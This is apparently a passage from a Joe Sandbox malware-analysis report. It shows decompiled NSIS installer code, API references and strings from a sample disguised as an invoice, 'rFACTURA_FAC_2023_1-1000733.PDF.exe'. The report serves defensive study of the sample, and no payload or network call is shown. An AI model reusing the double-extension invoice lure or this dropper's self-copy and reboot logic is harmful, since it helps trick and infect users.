							if(E00405C38(_t236,  &(_t184[2])) == 0) {
								goto L48;
							}
							E0040625F(L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\Musicalises34\\Coleman\\Biarcuated", _t185);
							E0040625F(L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\Musicalises34\\Coleman\\Biarcuated", _t185);
							 *(_t197 + 0x10) = _t151;
							goto L47;
						}
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_t159 = ( *0x40a27e & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
						_t120 = ( *0x40a282 & 0x0000ffff) << 0x00000010 |  *0x40a280 & 0x0000ffff | (_t164 << 0x00000020 |  *0x40a282 & 0x0000ffff) << 0x10;
						while( *_t184 != _t159 || _t184[1] != _t120) {
							_t184 = _t184;
							if(_t184 >= _t193) {
								continue;
							}
							break;
						}
						_t151 = 0;
						goto L44;
					}
					GetWindowsDirectoryW(_t172, 0x3fb);
					lstrcatW(_t172, L"\\Temp");
					_t123 = E0040331F(_t155, _t225);
					_t226 = _t123;
					if(_t123 != 0) {
						goto L36;
					}
					GetTempPathW(0x3fc, _t172);
					lstrcatW(_t172, L"Low");
					SetEnvironmentVariableW(L"TEMP", _t172);
					SetEnvironmentVariableW(L"TMP", _t172);
					_t128 = E0040331F(_t155, _t226);
					_t227 = _t128;
					if(_t128 == 0) {
						goto L48;
					}
					goto L36;
				} else {
					do {
						_t154 = 0x20;
						if(_t66 != _t154) {
							L13:
							if( *_t155 == 0x22) {
								_t155 = _t155 + 2;
								_t154 = 0x22;
							}
							if( *_t155 != 0x2f) {
								goto L27;
							} else {
								_t155 = _t155 + 2;
								if( *_t155 == 0x53) {
									_t148 =  *((intOrPtr*)(_t155 + 2));
									if(_t148 == 0x20 || _t148 == 0) {
										 *0x7a8ae0 = 1;
									}
								}
								asm("cdq");
								asm("cdq");
								_t169 = L"NCRC" & 0x0000ffff;
								asm("cdq");
								_t175 = ( *0x40a2c2 & 0x0000ffff) << 0x00000010 |  *0x40a2c0 & 0x0000ffff | _t169;
								if( *_t155 == (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t169) &&  *((intOrPtr*)(_t155 + 4)) == _t175) {
									_t147 =  *((intOrPtr*)(_t155 + 8));
									if(_t147 == 0x20 || _t147 == 0) {
										 *(_t197 + 0x1c) =  *(_t197 + 0x1c) | 0x00000004;
									}
								}
								asm("cdq");
								asm("cdq");
								_t164 = L" /D=" & 0x0000ffff;
								asm("cdq");
								_t178 = ( *0x40a2b6 & 0x0000ffff) << 0x00000010 |  *0x40a2b4 & 0x0000ffff | _t164;
								if( *(_t155 - 4) != (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t164) ||  *_t155 != _t178) {
									goto L27;
								} else {
									 *(_t155 - 4) =  *(_t155 - 4) & 0x00000000;
									__eflags = _t155;
									E0040625F(L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\Musicalises34\\Coleman\\Biarcuated", _t155);
									L32:
									_t151 = 0;
									goto L33;
								}
							}
						} else {
							goto L12;
						}
						do {
							L12:
							_t155 = _t155 + 2;
						} while ( *_t155 == _t154);
						goto L13;
						L27:
						_t155 = E00405B5D(_t155, _t154);
						if( *_t155 == 0x22) {
							_t155 = _t155 + 2;
						}
						_t66 =  *_t155;
					} while (_t66 != 0);
					goto L32;
				}
				L4:
				E004065C9(_t179); // executed
				_t179 =  &(_t179[lstrlenA(_t179) + 1]);
				if( *_t179 != 0) {
					goto L4;
				} else {
					E00406639(0xa);
					 *0x7a8a24 = E00406639(8);
					_t56 = E00406639(6);
					if(_t56 != _t151) {
						_t56 =  *_t56(0x1e);
						if(_t56 != 0) {
							 *0x7a8a2f =  *0x7a8a2f | 0x00000040;
						}
					}
					goto L8;
				}
			}

0x0040335b
0x0040335c
0x00403363
0x00403367
0x0040336f
0x00403373
0x0040337f
0x00403388
0x0040338d
0x00403390
0x00403397
0x0040339e
0x0040339e
0x00403397
0x004033a0
0x004033a0
0x004033e8
0x004033e9
0x004033f0
0x004033f6
0x0040340c
0x0040341c
0x00403421
0x00403427
0x0040342e
0x00403442
0x00403447
0x00403449
0x0040344d
0x00403452
0x00403452
0x00403461
0x00403463
0x00403467
0x0040346d
0x00403584
0x0040358a
0x00403595
0x00403597
0x0040359c
0x0040359e
0x004035f6
0x004035fb
0x00403605
0x0040360c
0x00403610
0x004036c1
0x004036c1
0x004036c6
0x004036cc
0x004036d1
0x004037f7
0x004037fd
0x0040387b
0x0040387b
0x00403880
0x00403883
0x00403885
0x00403885
0x0040388d
0x0040388d
0x0040380d
0x00403813
0x00403815
0x00403822
0x00403835
0x0040383d
0x00403845
0x00403845
0x0040384d
0x00403852
0x00403859
0x00403867
0x0040386a
0x00403870
0x00403872
0x00000000
0x00000000
0x00000000
0x0040385b
0x00403861
0x00403863
0x00403865
0x00403874
0x00403876
0x00000000
0x00403876
0x00000000
0x00403865
0x00403859
0x004036e0
0x004036e7
0x004036e7
0x0040361c
0x004036b1
0x004036b1
0x004036bd
0x00000000
0x004036bd
0x00403629
0x0040362d
0x0040367b
0x0040367b
0x0040367d
0x00403685
0x004036f8
0x004036fa
0x00403701
0x00403709
0x00403709
0x00403714
0x00403719
0x00403728
0x0040372c
0x0040372d
0x00403736
0x0040372f
0x0040372f
0x0040372f
0x0040373c
0x00403742
0x00403749
0x00403751
0x00403751
0x0040375f
0x0040376b
0x00403779
0x0040377e
0x00403784
0x00403790
0x00403796
0x004037a0
0x004037b6
0x004037c7
0x004037cd
0x004037d4
0x004037d7
0x004037dd
0x004037dd
0x004037d4
0x004037e1
0x004037e8
0x004037e8
0x004037ed
0x004037ed
0x00000000
0x00403728
0x00403687
0x0040368a
0x00403695
0x00000000
0x00000000
0x0040369d
0x004036a8
0x004036ad
0x00000000
0x004036ad
0x00403636
0x0040364e
0x0040365f
0x00403660
0x00403664
0x00403666
0x00403674
0x00403677
0x00000000
0x00000000
0x00000000
0x00403677
0x00403679
0x00000000
0x00403679
0x004035a6
0x004035b2
0x004035b7
0x004035bc
0x004035be
0x00000000
0x00000000
0x004035c6
0x004035ce
0x004035df
0x004035e7
0x004035e9
0x004035ee
0x004035f0
0x00000000
0x00000000
0x00000000
0x00403473
0x00403473
0x00403475
0x00403479
0x00403482
0x00403486
0x0040348b
0x0040348c
0x0040348c
0x00403491
0x00000000
0x00403497
0x00403498
0x0040349d
0x0040349f
0x004034a7
0x004034ae
0x004034ae
0x004034a7
0x004034bf
0x004034d2
0x004034d3
0x004034e8
0x004034ed
0x004034f1
0x004034fa
0x00403502
0x00403509
0x00403509
0x00403502
0x00403515
0x00403528
0x00403529
0x0040353e
0x00403544
0x00403548
0x00000000
0x0040356f
0x0040356f
0x00403574
0x0040357d
0x00403582
0x00403582
0x00000000
0x00403582
0x00403548
0x00000000
0x00000000
0x00000000
0x0040347b
0x0040347b
0x0040347c
0x0040347d
0x00000000
0x00403550
0x00403557
0x0040355d
0x00403560
0x00403560
0x00403561
0x00403564
0x00000000
0x0040356d
0x004033a5
0x004033a6
0x004033b2
0x004033b9
0x00000000
0x004033bb
0x004033bd
0x004033cb
0x004033d0
0x004033d7
0x004033db
0x004033df
0x004033e1
0x004033e1
0x004033df
0x00000000
0x004033d7

APIs

SetErrorMode.KERNELBASE ref: 00403373
GetVersion.KERNEL32 ref: 00403379
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033AC
#17.COMCTL32(?,00000006,00000008,0000000A), ref: 004033E9
OleInitialize.OLE32(00000000), ref: 004033F0
SHGetFileInfoW.SHELL32(0079FEE0,00000000,?,000002B4,00000000), ref: 0040340C
GetCommandLineW.KERNEL32(Tophyperidrosis Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 00403421
GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe",00000000,?,00000006,00000008,0000000A), ref: 00403434
CharNextW.USER32(00000000,"C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe",00000020,?,00000006,00000008,0000000A), ref: 0040345B

Part of subcall function 00406639: GetModuleHandleA.KERNEL32(?,00000020,?,004033C2,0000000A), ref: 0040664B
Part of subcall function 00406639: GetProcAddress.KERNEL32(00000000,?), ref: 00406666

GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403595
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004035A6
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004035B2
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035C6
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004035CE
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035DF
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004035E7
DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 004035FB

Part of subcall function 0040625F: lstrcpynW.KERNEL32(?,?,00000400,00403421,Tophyperidrosis Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 0040626C

OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 004036C6
ExitProcess.KERNEL32 ref: 004036E7
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 004036FA
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 00403709
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403714
lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403720
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040373C
DeleteFileW.KERNEL32(0079F6E0,0079F6E0,?,007A9000,00000008,?,00000006,00000008,0000000A), ref: 00403796
CopyFileW.KERNEL32(C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe,0079F6E0,?,?,00000006,00000008,0000000A), ref: 004037AA
CloseHandle.KERNEL32(00000000,0079F6E0,0079F6E0,?,0079F6E0,00000000,?,00000006,00000008,0000000A), ref: 004037D7
GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403806
OpenProcessToken.ADVAPI32(00000000), ref: 0040380D
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403822
AdjustTokenPrivileges.ADVAPI32 ref: 00403845
ExitWindowsEx.USER32(00000002,80040002), ref: 0040386A
ExitProcess.KERNEL32 ref: 0040388D

Strings

TEMP, xrefs: 004035DA
C:\Users\user\AppData\Local\Temp\, xrefs: 0040358A, 0040358F, 004035A5, 004035B1, 004035C0, 004035CD, 004035D9, 004035E1, 004036F7, 00403708, 00403713, 0040371F, 0040372C, 0040373B, 004037EC
Low, xrefs: 004035C8
Error launching installer, xrefs: 0040367D
NSIS Error, xrefs: 00403412
TMP, xrefs: 004035E2
C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated, xrefs: 00403578, 00403698, 00403742, 0040374C
.tmp, xrefs: 0040370E
1033, xrefs: 004035F6
"C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe", xrefs: 00403427, 0040342D, 00403623
Tophyperidrosis Setup, xrefs: 00403417
C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated, xrefs: 004036A3
SeShutdownPrivilege, xrefs: 0040381C
C:\Users\user\Desktop, xrefs: 00403719, 0040371E, 0040374B
C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe, xrefs: 004037A5
\Temp, xrefs: 004035AC
~nsu, xrefs: 004036F2
UXTHEME, xrefs: 004033A0, 004033A5, 004033AB

Memory Dump Source

Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411716682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411876056.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007EF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd

Similarity

API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
String ID: "C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated$C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated$C:\Users\user\Desktop$C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$Tophyperidrosis Setup$UXTHEME$\Temp$~nsu
API String ID: 2488574733-2912737113
Opcode ID: 50ce3784074dcbd526eb1f42df312bf4ec451fb13847cd92a6110888af3a5c2d
Instruction ID: f8b53dcf82f20274bbdd851e6e7f34b77cfd1224ece1df9e86175f3a8edd883a
Opcode Fuzzy Hash: 50ce3784074dcbd526eb1f42df312bf4ec451fb13847cd92a6110888af3a5c2d
Instruction Fuzzy Hash: CED11371500310AAD7207F759D85B3B3AACEB41746F00493FF981B62E2DB7D8A458B6E

Uniqueness

Uniqueness Score: -1.00%

Function 00405402 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00405402(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t94;
				long _t95;
				int _t100;
				int _t101;
				long _t104;
				void* _t108;
				intOrPtr _t119;
				void* _t127;
				intOrPtr _t130;
				struct HWND__* _t134;
				int _t156;
				int _t159;
				struct HMENU__* _t164;
				struct HWND__* _t168;
				struct HWND__* _t169;
				int _t171;
				void* _t172;
				short* _t173;
				short* _t175;
				int _t177;

				_t169 =  *0x7a7a04; // 0x403ba
				_t156 = 0;
				_v8 = _t169;
				if(_a8 != 0x110) {
					__eflags = _a8 - 0x405;
					if(_a8 == 0x405) {
						_t127 = CreateThread(0, 0, E00405396, GetDlgItem(_a4, 0x3ec), 0,  &_v12); // executed
						CloseHandle(_t127); // executed
					}
					__eflags = _a8 - 0x111;
					if(_a8 != 0x111) {
						L17:
						_t171 = 1;
						__eflags = _a8 - 0x404;
						if(_a8 != 0x404) {
							L25:
							__eflags = _a8 - 0x7b;
							if(_a8 != 0x7b) {
								goto L20;
							}
							_t94 = _v8;
							__eflags = _a12 - _t94;
							if(_a12 != _t94) {
								goto L20;
							}
							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
							__eflags = _t95 - _t156;
							_a8 = _t95;
							if(_t95 <= _t156) {
								L36:
								return 0;
							}
							_t164 = CreatePopupMenu();
							AppendMenuW(_t164, _t156, _t171, E00406281(_t156, _t164, _t171, _t156, 0xffffffe1));
							_t100 = _a16;
							__eflags = _a16 - 0xffffffff;
							_t159 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v28);
								_t100 = _v28.left;
								_t159 = _v28.top;
							}
							_t101 = TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156);
							__eflags = _t101 - _t171;
							if(_t101 == _t171) {
								_v60 = _t156;
								_v48 = 0x7a1f20;
								_v44 = 0x1000;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t104 = SendMessageW(_v8, 0x1073, _a4,  &_v68);
									__eflags = _a4 - _t156;
									_t171 = _t171 + _t104 + 2;
								} while (_a4 != _t156);
								OpenClipboard(_t156);
								EmptyClipboard();
								_t108 = GlobalAlloc(0x42, _t171 + _t171);
								_a4 = _t108;
								_t172 = GlobalLock(_t108);
								do {
									_v48 = _t172;
									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
									 *_t173 = 0xd;
									_t175 = _t173 + 2;
									 *_t175 = 0xa;
									_t172 = _t175 + 2;
									_t156 = _t156 + 1;
									__eflags = _t156 - _a8;
								} while (_t156 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(0xd, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						__eflags =  *0x7a79ec - _t156; // 0x0
						if(__eflags == 0) {
							ShowWindow( *0x7a8a28, 8);
							__eflags =  *0x7a8acc - _t156;
							if( *0x7a8acc == _t156) {
								_t119 =  *0x7a0ef8; // 0xb7d614
								_t57 = _t119 + 0x34; // 0xffffffd5
								E004052C3( *_t57, _t156);
							}
							E004041CD(_t171);
							goto L25;
						}
						 *0x7a06f0 = 2;
						E004041CD(0x78);
						goto L20;
					} else {
						__eflags = _a12 - 0x403;
						if(_a12 != 0x403) {
							L20:
							return E0040425B(_a8, _a12, _a16);
						}
						ShowWindow( *0x7a79f0, _t156);
						ShowWindow(_t169, 8);
						E00404229(_t169);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_t177 = 2;
				_v60 = _t177;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t130 =  *0x7a8a34;
				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
				_a12 =  *((intOrPtr*)(_t130 + 0x60));
				 *0x7a79f0 = GetDlgItem(_a4, 0x403);
				 *0x7a79e8 = GetDlgItem(_a4, 0x3ee);
				_t134 = GetDlgItem(_a4, 0x3f8);
				 *0x7a7a04 = _t134;
				_v8 = _t134;
				E00404229( *0x7a79f0);
				 *0x7a79f4 = E00404B60("true");
				 *0x7a7a0c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(_t177);
				SendMessageW(_v8, 0x1061, 0,  &_v60);
				SendMessageW(_v8, 0x1036, 0x4000, 0x4000); // executed
				if(_a8 >= 0) {
					SendMessageW(_v8, 0x1001, 0, _a8);
					SendMessageW(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t156) {
					SendMessageW(_v8, 0x1024, _t156, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E004041F4(_a4);
				if(( *0x7a8a3c & 0x00000003) != 0) {
					ShowWindow( *0x7a79f0, _t156);
					if(( *0x7a8a3c & 0x00000002) != 0) {
						 *0x7a79f0 = _t156;
					} else {
						ShowWindow(_v8, 8);
					}
					E00404229( *0x7a79e8);
				}
				_t168 = GetDlgItem(_a4, 0x3ec);
				SendMessageW(_t168, 0x401, _t156, 0x75300000);
				if(( *0x7a8a3c & 0x00000004) != 0) {
					SendMessageW(_t168, 0x409, _t156, _a12);
					SendMessageW(_t168, 0x2001, _t156, _a8);
				}
				goto L36;
			}

0x0040540a
0x00405410
0x0040541a
0x0040541d
0x004055ac
0x004055b3
0x004055d0
0x004055d7
0x004055d7
0x004055dd
0x004055ea
0x00405608
0x0040560a
0x0040560b
0x00405612
0x00405668
0x00405668
0x0040566c
0x00000000
0x00000000
0x0040566e
0x00405671
0x00405674
0x00000000
0x00000000
0x0040567e
0x00405684
0x00405686
0x00405689
0x0040578b
0x00000000
0x0040578b
0x00405698
0x004056a3
0x004056ac
0x004056b3
0x004056b7
0x004056ba
0x004056c3
0x004056c9
0x004056cc
0x004056cc
0x004056dc
0x004056e2
0x004056e4
0x004056ed
0x004056f0
0x004056f7
0x004056fe
0x00405706
0x00405706
0x00405714
0x0040571a
0x0040571d
0x0040571d
0x00405724
0x0040572a
0x00405736
0x0040573d
0x00405746
0x00405748
0x0040574b
0x0040575a
0x0040575d
0x00405763
0x00405764
0x0040576a
0x0040576b
0x0040576c
0x0040576c
0x00405774
0x0040577f
0x00405785
0x00405785
0x00000000
0x004056e4
0x00405614
0x0040561a
0x0040564a
0x0040564c
0x00405652
0x00405654
0x0040565a
0x0040565d
0x0040565d
0x00405663
0x00000000
0x00405663
0x0040561e
0x00405628
0x00000000
0x004055ec
0x004055ec
0x004055f2
0x0040562d
0x00000000
0x00405636
0x004055fb
0x00405600
0x00405603
0x00000000
0x00405603
0x004055ea
0x00405423
0x00405427
0x0040542f
0x00405433
0x00405436
0x00405439
0x0040543c
0x0040543f
0x00405440
0x00405441
0x0040545a
0x0040545d
0x00405467
0x00405476
0x0040547e
0x00405486
0x0040548b
0x0040548e
0x0040549a
0x004054a3
0x004054ac
0x004054ce
0x004054d4
0x004054e5
0x004054ea
0x004054f8
0x00405506
0x00405506
0x0040550b
0x00405519
0x00405519
0x0040551e
0x00405521
0x00405526
0x00405532
0x0040553b
0x00405548
0x00405557
0x0040554a
0x0040554f
0x0040554f
0x00405563
0x00405563
0x00405577
0x00405580
0x00405589
0x00405599
0x004055a5
0x004055a5
0x00000000

APIs

GetDlgItem.USER32(?,00000403), ref: 00405460
GetDlgItem.USER32(?,000003EE), ref: 0040546F
GetClientRect.USER32(?,?), ref: 004054AC
GetSystemMetrics.USER32(00000002), ref: 004054B3
SendMessageW.USER32(?,00001061,00000000,?), ref: 004054D4
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004054E5
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004054F8
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405506
SendMessageW.USER32(?,00001024,00000000,?), ref: 00405519
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040553B
ShowWindow.USER32(?,00000008), ref: 0040554F
GetDlgItem.USER32(?,000003EC), ref: 00405570
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405580
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405599
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004055A5
GetDlgItem.USER32(?,000003F8), ref: 0040547E

Part of subcall function 00404229: SendMessageW.USER32(00000028,?,?,00404054), ref: 00404237

GetDlgItem.USER32(?,000003EC), ref: 004055C2
CreateThread.KERNEL32(00000000,00000000,Function_00005396,00000000), ref: 004055D0
CloseHandle.KERNELBASE(00000000), ref: 004055D7
ShowWindow.USER32(00000000), ref: 004055FB
ShowWindow.USER32(000403BA,00000008), ref: 00405600
ShowWindow.USER32(00000008), ref: 0040564A
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040567E
CreatePopupMenu.USER32 ref: 0040568F
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004056A3
GetWindowRect.USER32(?,?), ref: 004056C3
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004056DC
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405714
OpenClipboard.USER32(00000000), ref: 00405724
EmptyClipboard.USER32 ref: 0040572A
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405736
GlobalLock.KERNEL32(00000000), ref: 00405740
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405754
GlobalUnlock.KERNEL32(00000000), ref: 00405774
SetClipboardData.USER32(0000000D,00000000), ref: 0040577F
CloseClipboard.USER32 ref: 00405785

Strings

{, xrefs: 00405668

Memory Dump Source

Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411716682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411876056.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007EF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {
API String ID: 590372296-366298937
Opcode ID: 30a7d57daec831f4458769299bf5029d171b996c011ea2c71c6eb2cb9e30732f
Instruction ID: afdd0f92e7f9204a51c28d187295685e71ab7a2983d4d38ccc6b07981ce020cc
Opcode Fuzzy Hash: 30a7d57daec831f4458769299bf5029d171b996c011ea2c71c6eb2cb9e30732f
Instruction Fuzzy Hash: 6CB16AB1800608FFDB119FA0DD89DAE7B79FB48354F00812AFA45BA1A0CB795E51DF58

Uniqueness

Uniqueness Score: -1.00%

Function 0040596D Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E0040596D(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				short _v556;
				short _v558;
				struct _WIN32_FIND_DATAW _v604;
				signed int _t38;
				signed int _t52;
				signed int _t55;
				signed int _t62;
				void* _t64;
				signed char _t65;
				WCHAR* _t66;
				void* _t67;
				WCHAR* _t68;
				void* _t70;

				_t65 = _a8;
				_t68 = _a4;
				_v8 = _t65 & 0x00000004;
				_t38 = E00405C38(__eflags, _t68);
				_v12 = _t38;
				if((_t65 & 0x00000008) != 0) {
					_t62 = DeleteFileW(_t68); // executed
					asm("sbb eax, eax");
					_t64 =  ~_t62 + 1;
					 *0x7a8ac8 =  *0x7a8ac8 + _t64;
					return _t64;
				}
				_a4 = _t65;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E0040625F(0x7a3f28, _t68);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405B7C(_t68);
					} else {
						lstrcatW(0x7a3f28, L"\\*.*");
					}
					__eflags =  *_t68;
					if( *_t68 != 0) {
						L10:
						lstrcatW(_t68, 0x40a014);
						L11:
						_t66 =  &(_t68[lstrlenW(_t68)]);
						_t38 = FindFirstFileW(0x7a3f28,  &_v604);
						_t70 = _t38;
						__eflags = _t70 - 0xffffffff;
						if(_t70 == 0xffffffff) {
							L26:
							__eflags = _a4;
							if(_a4 != 0) {
								_t30 = _t66 - 2;
